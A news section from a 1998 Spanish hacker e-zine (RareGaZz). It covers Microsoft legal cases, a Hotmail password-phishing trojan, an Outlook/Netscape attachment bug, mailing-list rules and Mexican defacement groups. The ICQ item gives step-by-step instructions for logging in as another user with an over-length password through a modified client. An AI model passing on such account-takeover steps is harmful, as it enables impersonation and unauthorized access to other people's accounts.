-=- -=- -= _______________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Novedades en el caso Vesatec ---------------------------- El caso mas reciente y bochornoso contra la libertad de expresion en Internet da un paso importante hacia adelante... la sede central de la BaSurA (BSA), ha decidido cerrar la sucursal de Barcelona, prescindiendo de su colaborador el Sr. X. Ribas, hasta ahora conocido como el Abogado Anti-Pirateria... jejjejejej, como se le conocera ahora? Las malas lenguas dicen que desde que se incorporo el nuevo director de Microsoft España (recordemos que la mayor parte de la BSA, pertenece a esta empresa), las cosas han cambiado mucho, y supongo que al revisar nuestro caso, informaron a cierta persona en Redmond, que no le haria mucha gracia, coincidiendo con su visita a Lisboa (el mismo dia que yo cumplo año, el 9/9) y su posible visita a Españ a posterior, pues han decidido limpiar un poco en casa. Por cierto segun fuentes de toda solvencia, el caso Vesatec, aparte de otro de similares caracteristicas ocurrido en Italia en fechas antes de lo nuestro (y que por cierto se resolvio a favor de los acusados), es uno de los mas importantes de Europa, y esta en la mira de buffettes abogaciles muy prestigiosos. Teneis toda la informacion del suceso en http://bsatec.org Salu2 Angeloso _______________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Ampliarian el caso judicial de microsoft ---------------------------------------- El Departamento de Justicia de los Estados Unidos y los 20 estados norteamericanos que estan demandando a Microsoft planean aumentar la presion sobre la empresa de Bill Gates al incluir alegatos sobre nuevas presuntas practicas monopslicas y dañinas por parte del gigante del software. Las nuevas acusaciones podrian ser presentadas hoy mismo e incluirian evidencia que demostraria que Microsoft presiono a Intel para que no tuviera en cuenta el software de su competidor Netscape Communications, que manipulo su sistema operativo Windows para que no pueda trabajar con productos de otras firmas, y que intento dividirse el mercado del software de audio y video con Apple Computer, de acuerdo a lo publicado por el Seattle Times. Segun estipula la ley norteamericana, el gobierno y los estados solo pueden incluir nueva evidencia en caso de que la misma esta relacionada con los cargos antes presentados. El juez que entiende en la causa, ahora debera determinar si la nueva evidencia puede ser tenida en cuenta para el juicio que comenzara el proximo 23 de septiembre. http://www.news.com/News/Item/0,4,25858,00.html?st.ne.4.head _______________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Nuevo sistema para acceder a los E-Mails sin encender el PC ----------------------------------------------------------- Un novedoso servicio de notificacion de emails original de Israel que esta desembarcando en los Estados Unidos propone una pratica manera de chequear el correo electronico. MailPush, como es conocido el nuevo sistema, permite a los usuarios con cuentas de email acceder a sus mensajes a traves de faxes, telefonos, celulares o pagers sin la necesidad de estar en permanente contacto con sus computadoras. El sistema, que tambien notifica a quien envia el mensaje que sus emails llegaron a destino, es ofrecido directamente a traves de Internet por una unidad de Cellcom, la empresa de telefonia celular mas grande de Israel. MailPush tambien planea distribuir el servicio a traves de las empresas proveedoras de Internet (ISP), al mismo tiempo que no descartan implementarlo en forma directa a traves de las compañias de telefono. Marc Schechtman, vicepresidente de MailPush, manifesto que proyectan que "de aqui a un año, el 5% de los usuarios norteamericanos de Internet se suscriban al servicio", y que planean llevarlo a otros 20 paises en un futuro cercano. http://www.news.com/News/Item/0,4,25856,00.html?st.ne.1.head _______________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Microsoft recharo las acusaciones de Sun con respecto a Java ------------------------------------------------------------ A traves de un documento presentado ante la corte que interviene en el caso el viernes pasado, Microsoft rechazo energicamente las intimacion preliminar presentada por Sun Microsystems en su contra alegando que una accion de ese tipo "causaria no solo un gran daño a Microsoft sino tambien a sus distribuidores, revendedores, desarrolladores de software e incluso a los propios usuarios". En el mes de mayo, Sun presento una intimacion preliminar argumentando que el Windows 98 incluye una version de Java que es incompatible con la desarrollada por ellos, por lo que solicita que se obligue a Microsoft a incluir la version de Sun en el flamante sistema operativo y que se le impida a la compañia de Bill Gates distribuir el Visual 6.0 hasta tanto no sea totalmente compatible con la version standard del Java de Sun. En su descargo realizado el viernes, Microsoft manifesto que no solo la empresa cumplio con la licencia sobre Java que mantiene con Sun, sino que todos sus productos son compatibles con el sistema en cuestion. http://www.techweb.com/wire/story/TWB19980828S0001 _______________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Una falla en Hotmail expuso los password de los usuarios -------------------------------------------------------- El proveedor de mail gratuito de Microsoft admitio que esta intentando reparar el problema originado en el servicio de correo de Hotmail, el cual permitio que programadores malintencionados de JavaScript pudieran alterar y vulnerar los passwords de los usuarios. El problema se detecto cuando la empresa Specialty Installations publico una demostracion del mismo en su site "Porque Podemos", el cual esta dedicado a los trabajos e investigaciones no rentadas de los programadores de paginas web de la compañia canadiense. Apodado "Hot" Mail, la muestra consta de un mail que contiene el denominado Caballo de Troya, un sistema que altera la interface de los usuarios con Hotmail. Una vez modificada la interface, cualquier comando que se ejecuta produce un mensaje falso por "expiracion de tiempo", y pide que se reingrese el nombre y password. Al cumplir con la requisitoria, el usuario retorna al site standard de Hotmail, pero el nombre y la clave personal en ese momento llegan a las manos de los delincuentes o, en este caso de demostracion, a Specialty Installations. Sean Fee, ejecutivo de Hotmail, manifesto que estan trabajando intensamente ya que "la proteccion de los mails y las cuentas de los clientes son de vital importancia para la compañia". http://www.news.com/News/Item/0,4,25620,00.html?st.en.fd.gif.f _______________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Bug del ICQ ----------- Un tipo Zachary Allison, ha logrado traspasarla seguridad del ICQ y hacerse pasar por cualquier usuario. Esta persona ha echo un clon del icq pero para linux, el zICQ, para linux, tomando las fuentes del mICQ y modificandolas, pero este no tiene la limitacion de pass del de Mirabilis, ya que este permite pass de mas de 8 caracteres, al contrario que el oficial que solo permite 8, y aqui esta el fallo que permite a un usuario suplantar a otro previo conocimiento de su UIN, si mandas un pass de mas de 8 caracteres el buffer de los servidores falla y te da acceso como el UIn que le digas. Primero se debe bajar el zICQ en: http://hookah.ml.org/zicq Usa tu programa ICQ para ver si el usuario legitimo esta conectado, si asi es espera que se desconete. Conecta con el zICQ, da el UIN que quiereas y el pass "123456789" El autor dice que esto no es spoofing, que simplemente estas conectado como el usuario seleccionado y que puedes recibir y mandar mensajes como si fueras el. Funcionara siempre y cuando otro UIN no se haya logueado como el UIN por el que te vas a hacer pasar.. _______________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Bug del E-Mail del Netscape y del Outlook ----------------------------------------- Dos investigadores de la Universidad finlandesa de Oulu, Ari Takanen y Marko Laakso, han descubierto un fallo de programacion en los programas gestores de correo electronico de Netscape y Outlook de Microsoft, que permitirman a intrusos informaticos con malas intenciones destruir o robar documentos e insertar diferentes virus en nuestro ordenador. Tanto Netscape como Microsoft han confirmado el hecho y han empezado a elaborar contrareloj "parches" o programas que corrijan el defecto. El defecto o "bug" se produce sin necesidad de abrir el mensaje, lo cual ha disparado la alarma en la comunidad de Internet, pues hace revivir un viejo fantasma que asolo la red en los primeros años, cuando se penso que la recepcion de un simple mensaje de correo electronico podria servir para que alguien entrara en nuestro ordenador. Algunos desaprensivos se encargaron a lo largo de los ultimos años de mantener vivo el temor, lanzando falsas ideas del tipo de "si usted abre un mensaje que lleve por titulo "Win a holiday" o "Good times" infectara automaticamente su maquina". La noticia hoy es que existe la posibilidad de que simplemente recibiendo un correo con un archivo adjunto, uno puede perder el control del propio ordenador. Cuando el fichero adjunto lleva un nombre extremadamente largo, con una extension superior a la que admite el sistema, el programa lector de correo se queda "colgado". Pero antes de ello, al parecer, se ejecuta el fichero en cuestion, que puede consistir en un virus o, por poner otro ejemplo, en un programa para copiar el contenido del disco duro y enviarlo por la red. Uno de los mayores expertos en seguridad en España, Jose Manuel Gomez, coordinador del sitio web Kriptspolis,http://kriptopolis.com en el que se da una amplia informacion del tema, ha asegurado en su boletin que "los usuarios estan ahora desprotegidos y, dada la implantacion de los programas de correo, tenemos al diablo sentado en la mesa". Sin embargo, a pesar de la convulsion, el modo concreto de explotar este "bug" aun no ha sido difundido. Tampoco han trascendido noticias de ataques. Netscape ha señ alado que en los proximos dias difundira una version que evite el problema, mientras Microsoft ha recomendado que no se lean los mensajes con ficheros adjuntos de comunicantes desconocidos. Netscape ha pedido que "bajo ninguna circunstancia se active el menu de Archivo cuando el mensaje esta seleccionado". Ambos fabricantes de software sugieren visitas periodicas a sus paginas dedicadas a seguridad, pues tan pronto tengan el "antidoto" lo difundiran. La fuerte competencia entre los navegadores ha llevado a ambas firmas rivales a comercializar software con errores tan graves como estos, segun coinciden diversos programadores consultados por nuestro diario. Como fuente de informacion adicional, se recomienda News.com, asi como el foro mas prestigioso de la red en cuestiones de "bugs" y errores de programacion: http://www.ntbuqtraq.com,dsd. _______________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Bug del Windows 98 ------------------ Aparentemente el Windows 98 tiene un bugs que funciona de la siguiente manera. El mal llamado sistema operativo (para mi software de sistema) parece que se resetea solo, a determinada hora de determinados dias. Parece que entre las 23:59 Hs. y las 24:00 Hs. (0:00 Hs.) del dias 31 de diciembre de cada año, dicho software se reinicia, solo sin ningun motivo aparente y sin previo aviso, como si se hubira pulsado la tecla Reset de la CPU. _______________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ La RareDudeZz esta cerca de los 500 usuarios -------------------------------------------- La lista de correo de RareGaZz (mas conocida por RareDudeZz) comenzo a funcionar con la unica intencion de avisar a nuestros lectores de las apariciones de nuevos numeros en nuestro e-zine, pero se ha convertido, gracias a todos, en uno de los mayores foros hispanos sobre temas underground. Hoy dia has cerca de 500 usuarios suscritos y se recibe una media de 20 o 30 mails diarios. El tema principal de la lista es el Hacking pero tambien se tratan otros temas y se ayuda a la gente mas iniciada, que parece que estan algo perdidos. Una vez mas quiero recordar las normas de la lista, las cuales podeis encontrar en la pagina principal de RareGaZz: - Formas de suscribirse: 1- Rellenando el formulario de nuestra Web 2- Enviando un e- mail a raregazz@iname.com poniendo en el subject: 'suscribe direc@de.correo' donde direc@de.correo es vuestra direccion de e-mail ... no me seais tan burros de poner 'direc@de.correo' ... que ya han habido varios. 3- Acceder a la pagina http://www.coollist.com y rellenar, abajo del todo, vuestros datos de e-mail y la lista de correo a la que os quereis suscribir; en este caso, la 'raredudez' (sin comillas). - Formas de desuscribirse: 1- Acceder a la pagina http://www.remove.coollist.com y rellenar vuestros datos de e-mail y la lista de correo a la que os quereis desuscribir; en este caso, la 'raredudez' (sin comillas). - Normas: * Las teneis todas en la pagina principal de nuestra Web. Leerlas antes de suscribiros porque luego hay mucha gente que rellena el formulario y pregunta ... que hago aqui? que es esto? porque me mandais tantos mails? Joder!!! no sabeis leer?. Pues eso, que leais bien las normas antes de suscribiros. * No preguntes tonterias. No quiero decir que la dudas de la gente iniciada sean tonterias. Al contrario, para eso estamos!! pero las preguntas tipo: 'quiero entrar en mi colegio para cambiarme las notas, explicarme en breve como lo hago ... '. $%&#@ merecen ser dados de baja inmediatamente. * Puedes preguntar cosas sobre h/p/v/c, incluso dudas sobre configuracion de Linux, pero ya esta. Tambien puedes comentar noticias o nuevos bugs. * Queda totalmente prohibido enviar attach en los mails (para eso disponemos de un FTP anonimo). - Ventajas: * Si estas iniciandote todo son ventajas. Pero mejor primero lee y cuando te enteres mas ya escribiras. No digas cosas de las que luego te vayas a arrepentir :) * Te enteraras de cuando salen nuevos numeros de nuestro e-zine, asi como de los e-zines de nuestros compañeros de SET y de JJFhackers, que estan haciendo tambien un buen trabajo. * Conoceras mas hackers, posiblemente de tu ciudad. * Quedadas 'secretas' en el IRC. Solo para RareDudeZz. * De vez en cuando hacemos estudios sobre la seguridad de algun server. Para ver los posibles agujeros que pueda tener. * Disponemos de un FTP anonimo donde intercambiar programas interesantes (no comerciales - no WareZz). * Aunque sean muchos mails, son cortos y sin attach, por lo que en 5 minutos los tienes todos en tu ordenador. - Inconvenientes: * La lista no esta moderada. Puedes recibir mails que no te interesen (y que tendras que soportar sin insultar y sin) meterte con nadie ... sino, seras borrado un mes de la lista. Esto lo digo porque ya hemos tenido algun ligero problemilla de gente muy 'guay' que piensa que algunas preguntas son muy 'lamer' para ellos. Por desgracia hay mucha gente asi. Te lloran para que les enseñes cosas y luego, cuando han aprendido 'algo', vacilan con los mas newbies, en vez de enseñarles. Y sino, leer el texto final de Set 16 (extraido de un log del IRC) y ver como se creen algunos que son 'guays' y resulta que nada mas que saben 'hablar' y banear a la gente. Señores, ser elite no consiste en conseguir 'op' en un canal de hacking de IRC. * 20 o 30 mails diarios. _______________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Undercon en Monterrey???? ------------------------- Hablando sobre la RareDudeZz, se ha estado discutiendo la posibilidad de hacer un Undercon en Monterrey, Mexico, se ve que hay mucho entusiasmo y ganas de lograr hacerlo. _______________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ X-Ploit TEAM ataca de nuevo --------------------------- El grupo mexicano de Crackers, clasificados asi por Rootshell, hizo de nuevo de las suyas en otro de los sites del gobierno mexicano, en esta ocasion la victima fue www.sanpedro.gob.mx, que es un municipio del estado de Nuevo Leon. _______________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ RaZa MeXiCaNa TEAM ------------------ Los señores(as) que se reunen en un canal denominado #RaZa_MeXicaNa, de los servidores de Red Latina del IRC han sacado el numero 1 y 2 de su boletin de seguridad, este boletin(muy bueno por cierto) lo puedes encontrar en: http://www.BigFoot.com/~RaZa-Mexicana ─[ L l a v e s P G P ]──────────────────────────────────────────────────────── <<::RareGaZz::>> // raregazz@iname.com -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com> 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 4XwaDg== =crAP -----END PGP PUBLIC KEY BLOCK----- <<::Azumlord::>> // azumlord@iname.com -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com> mQENAzPjTJ8AAAEIAPK1KI9F97qe09G16Rstzd1tlELbGmgRy8UPyzUkvMOTXIS9 onTp5gM3VEg8vJjCT9QrHsz6g0qRzttCO/+ixiHakVK3pzRO8EudwCVVEDECwAmM aTDdspOZEn/mwoIO/UsAHAxQAuXNXL4JqscJ/ZNAlySchJgVk5KngyqMXlqpmwNW CO7Gh4Ese2saJ++xvXWQHb+iBLHd/xo3cvNeJg5dFT2W/AjXa4WS/pXFmr5v8tut yQIxJ4gw1XnEkoKlPIRQXLmHqs0Ct9069FbomKcfxb7mKbIIcAOhBKzhRtCQGiwJ 1yZOz61feAmCZTGT+wIcq0UGSeaQRzAu7Fxr5k0ABRG0IEF6dW0gTG9yZCA8QXp1 bUxvcmRAaG90bWFpbC5jb20+iQEVAwUQM+NMoEcwLuxca+ZNAQHi8ggAoRY+l28w xlFbSB+Fb32pvBrHjuTSTtsfJqtKMbwx9Ot++3TWW9G+WgeHtdlSnMXMlfe5+Ft2 MxQwXfqMR4OzgyBVnkoaPH0Z2PBz6Cij44sLCrEQ+nZnpPAMTe60NCRphKwbXMGK h8TNlIxxxPxtZSzO40dO4Rw5EkJcUQyykHmyHtzz/Ld7YfGYQmMEn40r2oX1k0/4 c8iJ1zrnzG6aiLKsvbm33SUx4wr9Q/0eBXALpijgzEs9PSau/ByCWEOwPJVpK2tQ MaBF4rfm53UJxOCUBU8zYbG1rNUTY6UpYvvffnyaPzPoIZd2reYxY5i44WJCEXMF +aRDrCB+VURqtg== =r674 -----END PGP PUBLIC KEY BLOCK----- Cytorax // cytorax@bigfoot.com -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com> mQCNAzSFCWgAAAEEAMfbmLIFrwArZmk6mM9B1kDJb9TFWpBpF5GoWfZyZvqlOMV0 e/0ngWnisCQcbZy42knU3brXuwyOzyRZ4DrfPfnGmShx8FpEM/uCszQYF00JQsWD 95Emq1I5d0V+BUAtoaMeCZn6dU5sgteImgIAxDR5lx4r8yWq70jBPfwtI2dNAAUR tB1DeXRvcmF4IDxDeXRvcmF4QGJpZ2Zvb3QuY29tPokAlQMFEDSFCWlIwT38LSNn TQEBSeoEAMBzsNwdq1A4EXT9ZkEwgSCeLofv7rUoJn4w75FvEBCfofijDWUwCkQJ FHGwcnAW4xg0wJzs4MByjSEvLnxCB++BmwGM6l8/NiyrolDk7rnOaHI1tU0wcCmz oNhHQdrfL0zmRNlR5QvXqlPnRxCB/GgLXLyrJGtvoDtv6U3SaL4s =Xw7I -----END PGP PUBLIC KEY BLOCK----- Guybrush // guybrush@cyberdude.com -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com> 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 WT2KqINEIKul1WKXCwr6 =yQRv -----END PGP PUBLIC KEY BLOCK----- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=( DESPEDIDA??? )=- >> p0r 4zU/|\l0rd Y Cy70r4x << -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NoTa: Solo apto para mentes rapidas, y claro con un poco de picardia mexicana. "No subira el dolar, ni el pan ni la tortilla...." CSG antes de ocupar la presidencia "Espionaje????, nosotros???" El FBI despues del caso Casa Blanca "Ya veras la transada que les doy a los gringos en esta operacion de compraventa..............." Santa Anna "Esos nacos gritones no me causan ni un dolor de cabeza" Maria Antonieta, Reina de Francia "No me volvere dictador aunque en ello me fuera la vida.............." Fidel Castro, Toma de Moncada "¿ Traidor yo ?, !Anda a chingar a la mas vieja de tu casa¡" Judas Esperamos que les halla gustado si tienen alguna duda o sugerencia favor de comunicarlos a los telefonos 01-800-RareGaZz-HoTLiNe, nos vemos la proxima. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=